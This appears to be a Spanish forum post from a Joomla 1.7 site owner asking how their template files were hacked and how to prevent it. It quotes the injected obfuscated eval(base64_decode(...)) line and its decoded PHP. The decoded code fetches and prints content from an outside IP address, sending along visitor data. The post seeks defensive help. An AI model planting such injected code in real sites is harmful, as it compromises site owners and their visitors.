Estoy ejecutando un sitio Joomla 1.7 que fue hackeado hoy. Debajo de la secuencia de comandos hizo el hack.
eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));
La línea anterior se inyectó en mi archivo index.php
de la carpeta de plantillas. Cada plantilla que estaba en la carpeta tenía el código anterior. En cada archivo se repitió varias veces.
Cuando decodifico el código, sale
print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI']));
He eliminado el script y el sitio funciona bien. El script no hizo nada malo, excepto que el sitio no se cargó en absoluto.
Mi problema es incluso cuando he establecido el permiso de archivo en 644 y el permiso de carpeta en 755, ¿Cómo pudo pasar esto?
¿Cómo puedo averiguar qué causó el problema? ¿Qué pasos debo tomar para evitar que esto suceda en el futuro?
ACTUALIZACIÓN
Este Asistente de publicación en foros / FPA es muy útil